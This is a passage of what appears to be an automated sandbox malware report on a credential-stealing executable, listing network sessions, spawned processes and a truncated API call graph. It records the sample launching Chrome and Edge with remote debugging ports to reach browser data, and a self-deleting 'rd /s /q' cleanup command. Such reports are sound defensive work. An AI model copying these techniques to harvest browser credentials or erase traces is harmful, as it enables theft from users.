2024-12-20 06:32:07 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: NKQ+U+tyuESjlfbu.2Context: c78654c66e979867<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWAgqWEry+XLLb96tInFYFRmEJyhonhbopTD+1CzJW8BnsEx3YxB/WRudpg7JqbWwpqeaeV10b/4JdJJPDua2tWus1KtXbPe349g/GFKaZ6rb3
2024-12-20 06:32:07 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: NKQ+U+tyuESjlfbu.3Context: c78654c66e979867<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-20 06:32:08 UTC | 14 | IN | Data Ascii: 202 1 CON 58
2024-12-20 06:32:08 UTC | 58 | IN | Data Ascii: MS-CV: WB6mUs0tzkOgYkiqBfZ5/Q.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port
66 | 192.168.2.6 | 50061 | 20.198.119.143 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:32:22 UTC | 70 | OUT | Data Ascii: CNT 1 CON 304MS-CV: GNTN8NRW30WWgu0/.1Context: a7ed70d24399b18
2024-12-20 06:32:22 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-20 06:32:22 UTC | 1083 | OUT | Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: GNTN8NRW30WWgu0/.2Context: a7ed70d24399b18<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWAgqWEry+XLLb96tInFYFRmEJyhonhbopTD+1CzJW8BnsEx3YxB/WRudpg7JqbWwpqeaeV10b/4JdJJPDua2tWus1KtXbPe349g/GFKaZ6rb39
2024-12-20 06:32:22 UTC | 73 | OUT | Data Ascii: BND 3 CON\QOS 55MS-CV: GNTN8NRW30WWgu0/.3Context: a7ed70d24399b18
2024-12-20 06:32:23 UTC | 14 | IN | Data Ascii: 202 1 CON 58
2024-12-20 06:32:23 UTC | 58 | IN | Data Ascii: MS-CV: hBKT2O8adUmmwsLkc9y6Kg.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port
67 | 192.168.2.6 | 50103 | 20.198.118.190 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:32:40 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: QTgY1/v5T0mPKUpE.1Context: 543f008cef089fac
2024-12-20 06:32:40 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-20 06:32:40 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: QTgY1/v5T0mPKUpE.2Context: 543f008cef089fac<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWAgqWEry+XLLb96tInFYFRmEJyhonhbopTD+1CzJW8BnsEx3YxB/WRudpg7JqbWwpqeaeV10b/4JdJJPDua2tWus1KtXbPe349g/GFKaZ6rb3
2024-12-20 06:32:40 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: QTgY1/v5T0mPKUpE.3Context: 543f008cef089fac<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-20 06:32:41 UTC | 14 | IN | Data Ascii: 202 1 CON 58
2024-12-20 06:32:41 UTC | 58 | IN | Data Ascii: MS-CV: 0z/MuMXBFkybIzCHRPSfMg.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port
68 | 192.168.2.6 | 50154 | 20.198.118.190 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:33:01 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: bmO+2TRDikGJ37mc.1Context: 4358e0f8ec5660fc
2024-12-20 06:33:01 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-20 06:33:01 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: bmO+2TRDikGJ37mc.2Context: 4358e0f8ec5660fc<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWAgqWEry+XLLb96tInFYFRmEJyhonhbopTD+1CzJW8BnsEx3YxB/WRudpg7JqbWwpqeaeV10b/4JdJJPDua2tWus1KtXbPe349g/GFKaZ6rb3
2024-12-20 06:33:01 UTC | 74 | OUT | Data Ascii: BND 3 CON\QOS 56MS-CV: bmO+2TRDikGJ37mc.3Context: 4358e0f8ec5660fc
2024-12-20 06:33:02 UTC | 14 | IN | Data Ascii: 202 1 CON 58
2024-12-20 06:33:02 UTC | 58 | IN | Data Raw: 4d 53 2d 43 56 3a 20 45 41 44 75 47 43 65 32 6b 6b 6d 2b 33 51 6f 6a 73 78 31 50 64 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                Data Ascii: MS-CV: EADuGCe2kkm+3Qojsx1PdA.0Payload parsing failed.



                                                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                                                Start time:01:30:58
                                                                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\ktyihkdfesf.exe"
                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                File size:147'968 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:CC36E2A5A3C64941A79C31CA320E9797
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                                                                                Start time:01:31:15
                                                                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                                                                                Start time:01:31:16
                                                                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 --field-trial-handle=2348,i,3398562599031357926,1603104178569398074,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                                                                                                Start time:01:31:30
                                                                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                                                                                                Start time:01:31:30
                                                                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2564 --field-trial-handle=2228,i,2139828529892091342,11985651726309101408,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                                                                                                Start time:01:31:30
                                                                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                                Has exited:false

Target ID:15
Start time:01:31:31
Start date:20/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2996 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:3
Imagebase:0x7ff715da0000
File size:4'210'216 bytes
MD5 hash:BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:false

Target ID:20
Start time:01:31:35
Start date:20/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6600 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8
Imagebase:0x7ff715da0000
File size:4'210'216 bytes
MD5 hash:BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:21
Start time:01:31:35
Start date:20/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6744 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8
Imagebase:0x7ff715da0000
File size:4'210'216 bytes
MD5 hash:BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:22
Start time:01:31:36
Start date:20/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7152 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8
Imagebase:0x7ff6f2da0000
File size:1'255'976 bytes
MD5 hash:F8CEC3E43A6305AC9BA3700131594306
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:01:31:36
Start date:20/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7152 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8
Imagebase:0x7ff6f2da0000
File size:1'255'976 bytes
MD5 hash:F8CEC3E43A6305AC9BA3700131594306
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:01:32:04
Start date:20/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\K6FKFCT00ZU3" & exit
Imagebase:0x1c0000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:01:32:04
Start date:20/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:01:32:04
Start date:20/12/2024
Path:C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):true
Commandline:timeout /t 10
Imagebase:0x860000
File size:25'088 bytes
MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                Target ID:31
                                                                                                                                                                                                                                                                                                Start time:01:32:31
                                                                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6792 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Has exited:false

Execution Graph

Execution Coverage:32%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:7.7%
Total number of Nodes:2000
Total number of Limit Nodes:26
strtok_s 13337->13342 13337->13344 13338->13342 13338->13344 13339->13342 13339->13344 13340->13342 13340->13344 13341->13342 13341->13344 13342->13344 13345 4134f6 13342->13345 13343 410240 2 API calls 13343->13344 13344->12578 13344->13337 13344->13338 13344->13339 13344->13340 13344->13341 13344->13342 13344->13343 13347 4134b3 StrCmpCA 13344->13347 13348 413452 StrCmpCA 13344->13348 13349 413475 StrCmpCA 13344->13349 13350 413494 StrCmpCA 13344->13350 13351 41342f StrCmpCA 13344->13351 13345->12578 13346->13333 13347->13344 13348->13342 13348->13344 13349->13344 13350->13344 13351->13342 13351->13344 13352->13333 13353->13333 13354->13333 13355->13333 13356->13333 13357->13333 13358->13333 13359->13333 13882 410530 13360->13882 13362 412c59 strtok_s 13363 412d34 13362->13363 13365 412c74 13362->13365 13363->12592 13364 412cf0 StrCmpCA 13364->13365 13365->13364 13366 410240 lstrlenA lstrcpyA 13365->13366 13367 412ca5 strtok_s 13365->13367 13366->13365 13367->13363 13367->13365 13369 4101c0 lstrcpyA 13368->13369 13370 413528 13369->13370 13371 410340 3 API calls 13370->13371 13372 413538 13371->13372 13373 410290 lstrcpyA 13372->13373 13374 413540 13373->13374 13375 410340 3 API calls 13374->13375 13376 413555 13375->13376 13377 410290 lstrcpyA 13376->13377 13378 41355d 13377->13378 13379 410340 3 API calls 13378->13379 13380 413571 13379->13380 13381 410290 lstrcpyA 13380->13381 13382 413579 13381->13382 13383 410340 3 API calls 13382->13383 13384 41358d 13383->13384 13385 410290 lstrcpyA 13384->13385 13386 413595 13385->13386 13387 410340 3 API calls 13386->13387 13388 4135a9 13387->13388 13389 410290 lstrcpyA 13388->13389 13390 4135b1 13389->13390 13883 410920 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 13390->13883 13392 4135bd 13393 410340 3 API calls 13392->13393 13394 4135c6 13393->13394 13395 410290 lstrcpyA 13394->13395 13396 4135ce 13395->13396 13397 410340 3 API calls 13396->13397 13398 4135e2 13397->13398 13399 410290 lstrcpyA 13398->13399 13400 
4135ea 13399->13400 13401 410340 3 API calls 13400->13401 13402 4135fe 13401->13402 13403 410290 lstrcpyA 13402->13403 13404 413606 13403->13404 13884 411120 RegOpenKeyExA 13404->13884 13406 413612 13407 410340 3 API calls 13406->13407 13408 41361b 13407->13408 13409 410290 lstrcpyA 13408->13409 13410 413623 13409->13410 13411 410340 3 API calls 13410->13411 13412 413637 13411->13412 13413 410290 lstrcpyA 13412->13413 13414 41363f 13413->13414 13415 410340 3 API calls 13414->13415 13416 413653 13415->13416 13417 410290 lstrcpyA 13416->13417 13418 41365b 13417->13418 13419 410700 7 API calls 13418->13419 13420 41366b 13419->13420 13421 4102e0 2 API calls 13420->13421 13422 413674 13421->13422 13423 410290 lstrcpyA 13422->13423 13424 41367c 13423->13424 13425 410340 3 API calls 13424->13425 13426 413697 13425->13426 13427 410290 lstrcpyA 13426->13427 13428 41369f 13427->13428 13429 410340 3 API calls 13428->13429 13430 4136b3 13429->13430 13431 410290 lstrcpyA 13430->13431 13432 4136bb 13431->13432 13433 410540 14 API calls 13432->13433 13434 4136c8 13433->13434 13435 4102e0 2 API calls 13434->13435 13436 4136d1 13435->13436 13437 410290 lstrcpyA 13436->13437 13438 4136d9 13437->13438 13439 410340 3 API calls 13438->13439 13440 4136f4 13439->13440 13441 410290 lstrcpyA 13440->13441 13442 4136fc 13441->13442 13443 410340 3 API calls 13442->13443 13444 413710 13443->13444 13445 410290 lstrcpyA 13444->13445 13446 413718 13445->13446 13447 41371f GetCurrentProcessId 13446->13447 13887 411cc0 OpenProcess 13447->13887 13450 4102e0 2 API calls 13451 413735 13450->13451 13452 410290 lstrcpyA 13451->13452 13453 41373d 13452->13453 13454 410340 3 API calls 13453->13454 13455 413758 13454->13455 13456 410290 lstrcpyA 13455->13456 13457 413760 13456->13457 13458 410340 3 API calls 13457->13458 13459 413774 13458->13459 13460 410290 lstrcpyA 13459->13460 13461 41377c 13460->13461 13462 410340 3 API calls 13461->13462 13463 413790 13462->13463 13464 410290 lstrcpyA 13463->13464 
13465 413798 13464->13465 13466 410340 3 API calls 13465->13466 13467 4137ac 13466->13467 13468 410290 lstrcpyA 13467->13468 13469 4137b4 13468->13469 13892 4107c0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegOpenKeyExA 13469->13892 13472 410340 3 API calls 13473 4137c9 13472->13473 13474 410290 lstrcpyA 13473->13474 13475 4137d1 13474->13475 13476 410340 3 API calls 13475->13476 13477 4137e5 13476->13477 13478 410290 lstrcpyA 13477->13478 13479 4137ed 13478->13479 13480 410340 3 API calls 13479->13480 13481 413801 13480->13481 13482 410290 lstrcpyA 13481->13482 13483 413809 13482->13483 13900 411200 13483->13900 13486 4102e0 2 API calls 13487 41381f 13486->13487 13488 410290 lstrcpyA 13487->13488 13489 413827 13488->13489 13490 410340 3 API calls 13489->13490 13491 413842 13490->13491 13492 410290 lstrcpyA 13491->13492 13493 41384a 13492->13493 13494 410340 3 API calls 13493->13494 13495 41385e 13494->13495 13496 410290 lstrcpyA 13495->13496 13497 413866 13496->13497 13498 411200 lstrcpyA 13497->13498 13499 413873 13498->13499 13500 4102e0 2 API calls 13499->13500 13501 41387c 13500->13501 13502 410290 lstrcpyA 13501->13502 13503 413884 13502->13503 13504 410340 3 API calls 13503->13504 13505 41389f 13504->13505 13506 410290 lstrcpyA 13505->13506 13507 4138a7 13506->13507 13508 410340 3 API calls 13507->13508 13509 4138bb 13508->13509 13510 410290 lstrcpyA 13509->13510 13511 4138c3 13510->13511 13903 4108e0 GetProcessHeap HeapAlloc GetComputerNameA 13511->13903 13513 4138cf 13514 410340 3 API calls 13513->13514 13515 4138d8 13514->13515 13516 410290 lstrcpyA 13515->13516 13517 4138e0 13516->13517 13518 410340 3 API calls 13517->13518 13519 4138f4 13518->13519 13520 410290 lstrcpyA 13519->13520 13521 4138fc 13520->13521 13522 410340 3 API calls 13521->13522 13523 413910 13522->13523 13524 410290 lstrcpyA 13523->13524 13525 413918 13524->13525 13904 4108b0 GetProcessHeap HeapAlloc GetUserNameA 13525->13904 13527 413924 13528 410340 3 API calls 13527->13528 
13529 41392d 13528->13529 13530 410290 lstrcpyA 13529->13530 13531 413935 13530->13531 13532 410340 3 API calls 13531->13532 13533 413949 13532->13533 13534 410290 lstrcpyA 13533->13534 13535 413951 13534->13535 13536 410340 3 API calls 13535->13536 13537 413965 13536->13537 13538 410290 lstrcpyA 13537->13538 13539 41396d 13538->13539 13905 4110a0 7 API calls 13539->13905 13542 4102e0 2 API calls 13543 413983 13542->13543 13544 410290 lstrcpyA 13543->13544 13545 41398b 13544->13545 13546 410340 3 API calls 13545->13546 13547 4139a6 13546->13547 13548 410290 lstrcpyA 13547->13548 13549 4139ae 13548->13549 13550 410340 3 API calls 13549->13550 13551 4139c2 13550->13551 13552 410290 lstrcpyA 13551->13552 13553 4139ca 13552->13553 13908 4109f0 13553->13908 13556 4102e0 2 API calls 13557 4139e0 13556->13557 13558 410290 lstrcpyA 13557->13558 13559 4139e8 13558->13559 13560 410340 3 API calls 13559->13560 13561 413a03 13560->13561 13562 410290 lstrcpyA 13561->13562 13563 413a0b 13562->13563 13564 410340 3 API calls 13563->13564 13565 413a1f 13564->13565 13566 410290 lstrcpyA 13565->13566 13567 413a27 13566->13567 13926 410920 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 13567->13926 13569 413a33 13570 410340 3 API calls 13569->13570 13571 413a3c 13570->13571 13572 410290 lstrcpyA 13571->13572 13573 413a44 13572->13573 13574 410340 3 API calls 13573->13574 13575 413a58 13574->13575 13576 410290 lstrcpyA 13575->13576 13577 413a60 13576->13577 13578 410340 3 API calls 13577->13578 13579 413a74 13578->13579 13580 410290 lstrcpyA 13579->13580 13581 413a7c 13580->13581 13927 410990 GetProcessHeap HeapAlloc GetTimeZoneInformation 13581->13927 13584 410340 3 API calls 13585 413a91 13584->13585 13586 410290 lstrcpyA 13585->13586 13587 413a99 13586->13587 13588 410340 3 API calls 13587->13588 13589 413aad 13588->13589 13590 410290 lstrcpyA 13589->13590 13591 413ab5 13590->13591 13592 410340 3 API calls 13591->13592 13593 413ac9 13592->13593 13594 410290 lstrcpyA 13593->13594 
13595 413ad1 13594->13595 13596 410340 3 API calls 13595->13596 13597 413ae5 13596->13597 13598 410290 lstrcpyA 13597->13598 13599 413aed 13598->13599 13930 410b30 GetProcessHeap HeapAlloc RegOpenKeyExA 13599->13930 13601 413af9 13602 410340 3 API calls 13601->13602 13603 413b02 13602->13603 13604 410290 lstrcpyA 13603->13604 13605 413b0a 13604->13605 13606 410340 3 API calls 13605->13606 13607 413b1e 13606->13607 13608 410290 lstrcpyA 13607->13608 13609 413b26 13608->13609 13610 410340 3 API calls 13609->13610 13611 413b3a 13610->13611 13612 410290 lstrcpyA 13611->13612 13613 413b42 13612->13613 13933 410be0 13613->13933 13616 410340 3 API calls 13617 413b57 13616->13617 13618 410290 lstrcpyA 13617->13618 13619 413b5f 13618->13619 13620 410340 3 API calls 13619->13620 13621 413b73 13620->13621 13622 410290 lstrcpyA 13621->13622 13623 413b7b 13622->13623 13624 410340 3 API calls 13623->13624 13625 413b8f 13624->13625 13626 410290 lstrcpyA 13625->13626 13627 413b97 13626->13627 13950 410ba0 GetSystemInfo wsprintfA 13627->13950 13629 413ba3 13630 410340 3 API calls 13629->13630 13631 413bac 13630->13631 13632 410290 lstrcpyA 13631->13632 13633 413bb4 13632->13633 13634 410340 3 API calls 13633->13634 13635 413bc8 13634->13635 13636 410290 lstrcpyA 13635->13636 13637 413bd0 13636->13637 13638 410340 3 API calls 13637->13638 13639 413be4 13638->13639 13640 410290 lstrcpyA 13639->13640 13641 413bec 13640->13641 13951 410cb0 GetProcessHeap HeapAlloc 13641->13951 13643 413bf8 13644 410340 3 API calls 13643->13644 13645 413c01 13644->13645 13646 410290 lstrcpyA 13645->13646 13647 413c09 13646->13647 13648 410340 3 API calls 13647->13648 13649 413c1d 13648->13649 13650 410290 lstrcpyA 13649->13650 13651 413c25 13650->13651 13652 410340 3 API calls 13651->13652 13653 413c39 13652->13653 13654 410290 lstrcpyA 13653->13654 13655 413c41 13654->13655 13954 410d30 13655->13954 13658 4102e0 2 API calls 13659 413c57 13658->13659 13660 410290 lstrcpyA 13659->13660 13661 413c5f 
